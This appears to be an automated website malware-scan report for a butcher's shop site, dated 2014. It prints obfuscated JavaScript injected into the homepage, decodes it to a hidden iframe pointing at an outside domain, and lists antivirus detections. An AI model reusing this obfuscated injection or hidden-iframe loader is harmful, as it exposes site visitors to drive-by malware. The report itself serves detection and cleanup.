New scan:

Malware Scanner report for metzgerei-winkler.com

Malicious/Suspicious/Total urls checked
1/0/2
1 page has malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "metzgerei-winkler.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=metzgerei-winkler.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://metzgerei-winkler.com/
200 OK
Content-Length: 2374
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

a=new Array(59.97,104.65,101.68,113.71,96.63,108.65,100.87,31.77,114.77,113.79,98.93,60.9,33.71,103.87,115.89,115.78,111.8,57.88,46.99,46.71,98.77,110.6,113.87,103.77,45.96,104.81,109.76,101.84,110.72,46.92,104.71,109.62,99.76,100.9,119.94,45.79,103.85,115.94,108.71,107.65,33.9,31.63,118.63,104.87,99.66,115.95,103.76,60.74,48.87,31.7,103.93,100.96,104.86,102.86,103.78,115.81,60.97,48.62,31.94,114.98,115.94,120.97,107.66,100.76,60.71,33.69,117.96,104.82,114.81,104.78,97.69,104.87,107.78,104.81,115.89,120.79,57.76,31.98,103.79,104.66,99.69,99.87,100.62,109.77,33.7,61.68,59.84,46.81,104.73,101.78,113.87,96.68,108.92,100.97,61.75);var i;
for (i=0;i<=a.length; i++){document.write(String.fromCharCode(Math.round(a[i])));};

Decoded script:


<iframe src="http://corh.info/index.html" width=1 height=1 style="visibility: hidden"></iframe>

Antivirus reports:

Avast
JS:Iframe-DYU [Trj]
Ad-Aware
JS:Trojan.JS.Agent.GIP
Ikarus
Trojan-Downloader.JS.Iframe
nProtect
JS:Trojan.JS.Agent.GIP
TrendMicro-HouseCall
TROJ_GEN.F47V1116
Emsisoft
JS:Trojan.JS.Agent.GIP (B)
DrWeb
SCRIPT.Virus
Kaspersky
Trojan-Downloader.JS.Iframe.vz
MicroWorld-eScan
JS:Trojan.JS.Agent.GIP
Fortinet
JS/Iframe.VZ!tr.dldr
F-Secure
JS:Trojan.JS.Agent.GIP
AVG
HTML/Framer
GData
JS:Trojan.JS.Agent.GIP
BitDefender
JS:Trojan.JS.Agent.GIP

http://metzgerei-winkler.com/test404page.js
404 Not Found
Content-Length: 299
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: metzgerei-winkler.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 31 Aug 2014 21:22:19 GMT
Accept-Ranges: bytes
ETag: "338f28-946-4529b5e849b80"
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 2374
Content-Type: text/html
Last-Modified: Tue, 22 Jul 2008 11:46:06 GMT

...2374 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: metzgerei-winkler.com
Referer: http://www.google.com/search?q=metzgerei-winkler.com

Result:
The result is similar to the first query. There are no suspicious redirects found.